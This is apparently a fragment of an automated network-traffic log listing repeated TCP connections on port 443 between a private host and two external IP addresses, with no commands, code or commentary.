Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 172.67.74.152:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.21.83.128:443
Source: global traffic	TCP traffic: 104.21.83.128:443 -> 192.168.2.22:49161
